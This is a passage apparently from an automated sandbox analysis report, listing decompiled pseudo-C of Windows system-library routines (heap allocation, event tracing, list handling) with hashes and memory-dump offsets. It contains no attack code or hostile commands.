                                        • Instruction ID: f8aea7b96de3f45b88dd95c83d4542bc21f7796c227490aedb6ec8c728a9e19a
                                        • Opcode Fuzzy Hash: d2b6de5621fa872afa64d2e15aa855107bf4acd67023bed295499954fb800239
                                        • Instruction Fuzzy Hash: AE318E31601B04CFD725CF28C848BABB7E6FF88714F14456DE59687A90EBB5AC01CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E05416C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                        				signed short* _v8;
                                        				signed char _v12;
                                        				void* _t22;
                                        				signed char* _t23;
                                        				intOrPtr _t24;
                                        				signed short* _t44;
                                        				void* _t47;
                                        				signed char* _t56;
                                        				signed char* _t58;
                                        
                                        				_t48 = __ecx;
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t44 = __ecx;
                                        				_v12 = __edx;
                                        				_v8 = __ecx;
                                        				_t22 = E053B7D50();
                                        				_t58 = 0x7ffe0384;
                                        				if(_t22 == 0) {
                                        					_t23 = 0x7ffe0384;
                                        				} else {
                                        					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        				}
                                        				if( *_t23 != 0) {
                                        					_t24 =  *0x5487b9c; // 0x0
                                        					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                        					_t23 = L053B4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                        					_t56 = _t23;
                                        					if(_t56 != 0) {
                                        						_t56[0x24] = _a4;
                                        						_t56[0x28] = _a8;
                                        						_t56[6] = 0x1420;
                                        						_t56[0x20] = _v12;
                                        						_t14 =  &(_t56[0x2c]); // 0x2c
                                        						E053DF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                        						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                        						if(E053B7D50() != 0) {
                                        							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        						}
                                        						_push(_t56);
                                        						_push(_t47 - 0x20);
                                        						_push(0x402);
                                        						_push( *_t58 & 0x000000ff);
                                        						E053D9AE0();
                                        						_t23 = L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                        					}
                                        				}
                                        				return _t23;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c961673d19dbb4a266b6295aea09ac4193884d62798dedc2d5211976bdc408ff
                                        • Instruction ID: baca60f4bac61aed8cf5003f9ffa99d3f1fd959940216d54070de4117f2fff0e
                                        • Opcode Fuzzy Hash: c961673d19dbb4a266b6295aea09ac4193884d62798dedc2d5211976bdc408ff
                                        • Instruction Fuzzy Hash: D621D172A00644AFD715DF68D984FAAB7B8FF48740F1400AAF905C7B91E634ED10CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 82%
                                        			E053D90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                        				intOrPtr* _v0;
                                        				void* _v8;
                                        				signed int _v12;
                                        				intOrPtr _v16;
                                        				char _v36;
                                        				void* _t38;
                                        				intOrPtr _t41;
                                        				void* _t44;
                                        				signed int _t45;
                                        				intOrPtr* _t49;
                                        				signed int _t57;
                                        				signed int _t58;
                                        				intOrPtr* _t59;
                                        				void* _t62;
                                        				void* _t63;
                                        				void* _t65;
                                        				void* _t66;
                                        				signed int _t69;
                                        				intOrPtr* _t70;
                                        				void* _t71;
                                        				intOrPtr* _t72;
                                        				intOrPtr* _t73;
                                        				char _t74;
                                        
                                        				_t65 = __edx;
                                        				_t57 = _a4;
                                        				_t32 = __ecx;
                                        				_v8 = __edx;
                                        				_t3 = _t32 + 0x14c; // 0x14c
                                        				_t70 = _t3;
                                        				_v16 = __ecx;
                                        				_t72 =  *_t70;
                                        				while(_t72 != _t70) {
                                        					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                        						L24:
                                        						_t72 =  *_t72;
                                        						continue;
                                        					}
                                        					_t30 = _t72 + 0x10; // 0x10
                                        					if(E053ED4F0(_t30, _t65, _t57) == _t57) {
                                        						return 0xb7;
                                        					}
                                        					_t65 = _v8;
                                        					goto L24;
                                        				}
                                        				_t61 = _t57;
                                        				_push( &_v12);
                                        				_t66 = 0x10;
                                        				if(E053CE5E0(_t57, _t66) < 0) {
                                        					return 0x216;
                                        				}
                                        				_t73 = L053B4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                        				if(_t73 == 0) {
                                        					_t38 = 0xe;
                                        					return _t38;
                                        				}
                                        				_t9 = _t73 + 0x10; // 0x10
                                        				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                        				E053DF3E0(_t9, _v8, _t57);
                                        				_t41 =  *_t70;
                                        				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                        					_t62 = 3;
                                        					asm("int 0x29");
                                        					_push(_t62);
                                        					_push(_t57);
                                        					_push(_t73);
                                        					_push(_t70);
                                        					_t71 = _t62;
                                        					_t74 = 0;
                                        					_v36 = 0;
                                        					_t63 = E053CA2F0(_t62, _t71, 1, 6,  &_v36);
                                        					if(_t63 == 0) {
                                        						L20:
                                        						_t44 = 0x57;
                                        						return _t44;
                                        					}
                                        					_t45 = _v12;
                                        					_t58 = 0x1c;
                                        					if(_t45 < _t58) {
                                        						goto L20;
                                        					}
                                        					_t69 = _t45 / _t58;
                                        					if(_t69 == 0) {
                                        						L19:
                                        						return 0xe8;
                                        					}
                                        					_t59 = _v0;
                                        					do {
                                        						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                        							goto L18;
                                        						}
                                        						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                        						 *_t59 = _t49;
                                        						if( *_t49 != 0x53445352) {
                                        							goto L18;
                                        						}
                                        						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                        						return 0;
                                        						L18:
                                        						_t63 = _t63 + 0x1c;
                                        						_t74 = _t74 + 1;
                                        					} while (_t74 < _t69);
                                        					goto L19;
                                        				}
                                        				 *_t73 = _t41;
                                        				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                        				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                        				 *_t70 = _t73;
                                        				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                        				return 0;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                        • Instruction ID: 3a5713b8adac1ff3bc1ce073cffa8aa1bc4740b232314a01eb5c1d04b84767ad
                                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                        • Instruction Fuzzy Hash: E6219272A00205EFDB21DF59D844FAAF7F9EB48710F14886AE945A7600D370ED00CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E053C3B7A(void* __ecx) {
                                        				signed int _v8;
                                        				char _v12;
                                        				intOrPtr _v20;
                                        				intOrPtr _t17;
                                        				intOrPtr _t26;
                                        				void* _t35;
                                        				void* _t38;
                                        				void* _t41;
                                        				intOrPtr _t44;
                                        
                                        				_t17 =  *0x54884c4; // 0x0
                                        				_v12 = 1;
                                        				_v8 =  *0x54884c0 * 0x4c;
                                        				_t41 = __ecx;
                                        				_t35 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x54884c0 * 0x4c);
                                        				if(_t35 == 0) {
                                        					_t44 = 0xc0000017;
                                        				} else {
                                        					_push( &_v8);
                                        					_push(_v8);
                                        					_push(_t35);
                                        					_push(4);
                                        					_push( &_v12);
                                        					_push(0x6b);
                                        					_t44 = E053DAA90();
                                        					_v20 = _t44;
                                        					if(_t44 >= 0) {
                                        						E053DFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x54884c0 * 0xc);
                                        						_t38 = _t35;
                                        						if(_t35 < _v8 + _t35) {
                                        							do {
                                        								asm("movsd");
                                        								asm("movsd");
                                        								asm("movsd");
                                        								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                        							} while (_t38 < _v8 + _t35);
                                        							_t44 = _v20;
                                        						}
                                        					}
                                        					_t26 =  *0x54884c4; // 0x0
                                        					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                        				}
                                        				return _t44;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • Opcode ID: 44b9bf44048463bc86720272455b2de43ac3b695b52d1d186fa7f89a57f8b7a7
                                        • Instruction ID: 2055662279b74645f3138cf8c897c49ed08c9b99bcadf018328d963a8f5d37ec
                                        • Opcode Fuzzy Hash: 44b9bf44048463bc86720272455b2de43ac3b695b52d1d186fa7f89a57f8b7a7
                                        • Instruction Fuzzy Hash: 6D21B072A00104AFC704DF58DD81BAEBBBEFB44708F2545A8E505AB251D771ED019BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                        			E05416CF0(void* __edx, intOrPtr _a4, short _a8) {
                                        				char _v8;
                                        				char _v12;
                                        				char _v16;
                                        				char _v20;
                                        				char _v28;
                                        				char _v36;
                                        				char _v52;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				signed char* _t21;
                                        				void* _t24;
                                        				void* _t36;
                                        				void* _t38;
                                        				void* _t46;
                                        
                                        				_push(_t36);
                                        				_t46 = __edx;
                                        				_v12 = 0;
                                        				_v8 = 0;
                                        				_v20 = 0;
                                        				_v16 = 0;
                                        				if(E053B7D50() == 0) {
                                        					_t21 = 0x7ffe0384;
                                        				} else {
                                        					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                        				}
                                        				if( *_t21 != 0) {
                                        					_t21 =  *[fs:0x30];
                                        					if((_t21[0x240] & 0x00000004) != 0) {
                                        						if(E053B7D50() == 0) {
                                        							_t21 = 0x7ffe0385;
                                        						} else {
                                        							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                        						}
                                        						if(( *_t21 & 0x00000020) != 0) {
                                        							_t56 = _t46;
                                        							if(_t46 == 0) {
                                        								_t46 = 0x5375c80;
                                        							}
                                        							_push(_t46);
                                        							_push( &_v12);
                                        							_t24 = E053CF6E0(_t36, 0, _t46, _t56);
                                        							_push(_a4);
                                        							_t38 = _t24;
                                        							_push( &_v28);
                                        							_t21 = E053CF6E0(_t38, 0, _t46, _t56);
                                        							if(_t38 != 0) {
                                        								if(_t21 != 0) {
                                        									E05417016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                        									L053B2400( &_v52);
                                        								}
                                        								_t21 = L053B2400( &_v28);
                                        							}
                                        						}
                                        					}
                                        				}
                                        				return _t21;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • Opcode ID: 6dd875899efe77f553c63af5441ce2d2f9f17e294b5453bbc60ee711ad938a55
                                        • Instruction ID: dff911ccafc3a3d9b610228eda91190e6d900d94b1a649ccd25b509042be558e
                                        • Opcode Fuzzy Hash: 6dd875899efe77f553c63af5441ce2d2f9f17e294b5453bbc60ee711ad938a55
                                        • Instruction Fuzzy Hash: B521D0726042549BD311DF29C948BEBBBECEF81680F05099BBD4087A50E734D909C7A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E0546070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                        				char _v8;
                                        				intOrPtr _v11;
                                        				signed int _v12;
                                        				intOrPtr _v15;
                                        				signed int _v16;
                                        				intOrPtr _v28;
                                        				void* __ebx;
                                        				char* _t32;
                                        				signed int* _t38;
                                        				signed int _t60;
                                        
                                        				_t38 = __ecx;
                                        				_v16 = __edx;
                                        				_t60 = E054607DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                        				if(_t60 != 0) {
                                        					_t7 = _t38 + 0x38; // 0x29cd5903
                                        					_push( *_t7);
                                        					_t9 = _t38 + 0x34; // 0x6adeeb00
                                        					_push( *_t9);
                                        					_v12 = _a8 << 0xc;
                                        					_t11 = _t38 + 4; // 0x5de58b5b
                                        					_push(0x4000);
                                        					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                        					E0545AFDE( &_v8,  &_v12);
                                        					E05461293(_t38, _v28, _t60);
                                        					if(E053B7D50() == 0) {
                                        						_t32 = 0x7ffe0380;
                                        					} else {
                                        						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                        					}
                                        					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                        						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                        						E054514FB(_t38,  *_t21, _v11, _v15, 0xd);
                                        					}
                                        				}
                                        				return  ~_t60;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                        • Instruction ID: 85f32921514b44ff0e87f7b25694594e6baab693e6517410d5bb1d7c81e9885d
                                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                        • Instruction Fuzzy Hash: 6A21C5363082049FD715DF19C888BAABBA5FBC4750F04856EF9999B385D630DD09CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 82%
                                        			E05417794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                        				intOrPtr _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _t21;
                                        				void* _t24;
                                        				intOrPtr _t25;
                                        				void* _t36;
                                        				short _t39;
                                        				signed char* _t42;
                                        				unsigned int _t46;
                                        				void* _t50;
                                        
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t21 =  *0x5487b9c; // 0x0
                                        				_t46 = _a8;
                                        				_v12 = __edx;
                                        				_v8 = __ecx;
                                        				_t4 = _t46 + 0x2e; // 0x2e
                                        				_t36 = _t4;
                                        				_t24 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                        				_t50 = _t24;
                                        				if(_t50 != 0) {
                                        					_t25 = _a4;
                                        					if(_t25 == 5) {
                                        						L3:
                                        						_t39 = 0x14b1;
                                        					} else {
                                        						_t39 = 0x14b0;
                                        						if(_t25 == 6) {
                                        							goto L3;
                                        						}
                                        					}
                                        					 *((short*)(_t50 + 6)) = _t39;
                                        					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                        					_t11 = _t50 + 0x2c; // 0x2c
                                        					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                        					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                        					E053DF3E0(_t11, _a12, _t46);
                                        					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                        					if(E053B7D50() == 0) {
                                        						_t42 = 0x7ffe0384;
                                        					} else {
                                        						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        					}
                                        					_push(_t50);
                                        					_t19 = _t36 - 0x20; // 0xe
                                        					_push(0x403);
                                        					_push( *_t42 & 0x000000ff);
                                        					E053D9AE0();
                                        					_t24 = L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                        				}
                                        				return _t24;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f72a5d188759f2f2d899b5eec70b9adf97df599e6dfcdc0295036c761c15e48
                                        • Instruction ID: 2e016e1d2f46332bfa862873f7ba59b56bac94263fb3af8b31aa27a0297470b7
                                        • Opcode Fuzzy Hash: 8f72a5d188759f2f2d899b5eec70b9adf97df599e6dfcdc0295036c761c15e48
                                        • Instruction Fuzzy Hash: BC21A772A00604AFC715DF59D894EA7B7B9FF48340F10056DF90AC7750DA34E900C794
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E053BAE73(intOrPtr __ecx, void* __edx) {
                                        				intOrPtr _v8;
                                        				void* _t19;
                                        				char* _t22;
                                        				signed char* _t24;
                                        				intOrPtr _t25;
                                        				intOrPtr _t27;
                                        				void* _t31;
                                        				intOrPtr _t36;
                                        				char* _t38;
                                        				signed char* _t42;
                                        
                                        				_push(__ecx);
                                        				_t31 = __edx;
                                        				_v8 = __ecx;
                                        				_t19 = E053B7D50();
                                        				_t38 = 0x7ffe0384;
                                        				if(_t19 != 0) {
                                        					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        				} else {
                                        					_t22 = 0x7ffe0384;
                                        				}
                                        				_t42 = 0x7ffe0385;
                                        				if( *_t22 != 0) {
                                        					if(E053B7D50() == 0) {
                                        						_t24 = 0x7ffe0385;
                                        					} else {
                                        						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                        					}
                                        					if(( *_t24 & 0x00000010) != 0) {
                                        						goto L17;
                                        					} else {
                                        						goto L3;
                                        					}
                                        				} else {
                                        					L3:
                                        					_t27 = E053B7D50();
                                        					if(_t27 != 0) {
                                        						_t27 =  *[fs:0x30];
                                        						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                        					}
                                        					if( *_t38 != 0) {
                                        						_t27 =  *[fs:0x30];
                                        						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                        							goto L5;
                                        						}
                                        						_t27 = E053B7D50();
                                        						if(_t27 != 0) {
                                        							_t27 =  *[fs:0x30];
                                        							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                        						}
                                        						if(( *_t42 & 0x00000020) != 0) {
                                        							L17:
                                        							_t25 = _v8;
                                        							_t36 = 0;
                                        							if(_t25 != 0) {
                                        								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                        							}
                                        							_t27 = E05417794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                        						}
                                        						goto L5;
                                        					} else {
                                        						L5:
                                        						return _t27;
                                        					}
                                        				}
                                        			}














                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                        • Instruction ID: 5c65bb483d253ec256393936c315090dc28911020d29516c3015a80ceef80254
                                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                        • Instruction Fuzzy Hash: 8F21B0356096809BE716DB69C948BB677EAFF44290F2904F1DE048BBD2D7B5DC40C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E053CFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                        				intOrPtr _v8;
                                        				void* _t19;
                                        				intOrPtr _t29;
                                        				intOrPtr _t32;
                                        				intOrPtr _t35;
                                        				intOrPtr _t37;
                                        				intOrPtr* _t40;
                                        
                                        				_t35 = __edx;
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t37 = 0;
                                        				_v8 = __edx;
                                        				_t29 = __ecx;
                                        				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                        					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                        					L3:
                                        					_t19 = _a4 - 4;
                                        					if(_t19 != 0) {
                                        						if(_t19 != 1) {
                                        							L7:
                                        							return _t37;
                                        						}
                                        						if(_t35 == 0) {
                                        							L11:
                                        							_t37 = 0xc000000d;
                                        							goto L7;
                                        						}
                                        						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                        							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                        							_t35 = _v8;
                                        						}
                                        						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                        						goto L7;
                                        					}
                                        					if(_t29 == 0) {
                                        						goto L11;
                                        					}
                                        					_t32 =  *_t40;
                                        					if(_t32 != 0) {
                                        						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                        						E053A76E2( *_t40);
                                        					}
                                        					 *_t40 = _t29;
                                        					goto L7;
                                        				}
                                        				_t40 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                        				if(_t40 == 0) {
                                        					_t37 = 0xc0000017;
                                        					goto L7;
                                        				}
                                        				_t35 = _v8;
                                        				 *_t40 = 0;
                                        				 *((intOrPtr*)(_t40 + 4)) = 0;
                                        				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                        				goto L3;
                                        			}











                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                        • Instruction ID: de69540c98ac9d2947dba5bc8013019600b8adbd0d845eceb0bebc4c22986fa0
                                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                        • Instruction Fuzzy Hash: E0217C72A04641DBD731CF59C544EA6FBEAFB94A10F2481BEE94687A15D770EC00CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 54%
                                        			E053CB390(void* __ecx, intOrPtr _a4) {
                                        				signed int _v8;
                                        				signed char _t12;
                                        				signed int _t16;
                                        				signed int _t21;
                                        				void* _t28;
                                        				signed int _t30;
                                        				signed int _t36;
                                        				signed int _t41;
                                        
                                        				_push(__ecx);
                                        				_t41 = _a4 + 0xffffffb8;
                                        				E053B2280(_t12, 0x5488608);
                                        				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                        				asm("sbb edi, edi");
                                        				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                        				_v8 = _t36;
                                        				asm("lock cmpxchg [ebx], ecx");
                                        				_t30 = 1;
                                        				if(1 != 1) {
                                        					while(1) {
                                        						_t21 = _t30 & 0x00000006;
                                        						_t16 = _t30;
                                        						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                        						asm("lock cmpxchg [edi], esi");
                                        						if(_t16 == _t30) {
                                        							break;
                                        						}
                                        						_t30 = _t16;
                                        					}
                                        					_t36 = _v8;
                                        					if(_t21 == 2) {
                                        						_t16 = E053D00C2(0x5488608, 0, _t28);
                                        					}
                                        				}
                                        				if(_t36 != 0) {
                                        					_t16 = L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                        				}
                                        				return _t16;
                                        			}












                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02883e03a2a980e30802acb7635a4b595e2ca26e6e15f9b6c87f849658d0ef42
                                        • Instruction ID: 1e44cad56f7035110f93d376d8d694fc2e038fe954edd5415b022bfef6adbe19
                                        • Opcode Fuzzy Hash: 02883e03a2a980e30802acb7635a4b595e2ca26e6e15f9b6c87f849658d0ef42
                                        • Instruction Fuzzy Hash: 2C114C373151105BCB28DA558D81ABBB7A7EBC5670B64017EDD16DB7C0DD315C02C794
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E05399240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr _t33;
                                        				intOrPtr _t37;
                                        				intOrPtr _t41;
                                        				intOrPtr* _t46;
                                        				void* _t48;
                                        				intOrPtr _t50;
                                        				intOrPtr* _t60;
                                        				void* _t61;
                                        				intOrPtr _t62;
                                        				intOrPtr _t65;
                                        				void* _t66;
                                        				void* _t68;
                                        
                                        				_push(0xc);
                                        				_push(0x546f708);
                                        				E053ED08C(__ebx, __edi, __esi);
                                        				_t65 = __ecx;
                                        				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                        				if( *(__ecx + 0x24) != 0) {
                                        					_push( *(__ecx + 0x24));
                                        					E053D95D0();
                                        					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                        				}
                                        				L6();
                                        				L6();
                                        				_push( *((intOrPtr*)(_t65 + 0x28)));
                                        				E053D95D0();
                                        				_t33 =  *0x54884c4; // 0x0
                                        				L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                        				_t37 =  *0x54884c4; // 0x0
                                        				L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                        				_t41 =  *0x54884c4; // 0x0
                                        				E053B2280(L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x54886b4);
                                        				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                        				_t46 = _t65 + 0xe8;
                                        				_t62 =  *_t46;
                                        				_t60 =  *((intOrPtr*)(_t46 + 4));
                                        				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                        					_t61 = 3;
                                        					asm("int 0x29");
                                        					_push(_t65);
                                        					_t66 = _t61;
                                        					_t23 = _t66 + 0x14; // 0x8df8084c
                                        					_push( *_t23);
                                        					E053D95D0();
                                        					_t24 = _t66 + 0x10; // 0x89e04d8b
                                        					_push( *_t24);
                                        					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                        					_t48 = E053D95D0();
                                        					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                        					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                        					return _t48;
                                        				} else {
                                        					 *_t60 = _t62;
                                        					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                        					 *(_t68 - 4) = 0xfffffffe;
                                        					E05399325();
                                        					_t50 =  *0x54884c4; // 0x0
                                        					return E053ED0D1(L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                        				}
                                        			}
















                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 1f613fb90a71c9ad943e0c3093f18e64bf3d1a9e5b4c04e96195fa88bf2d2549
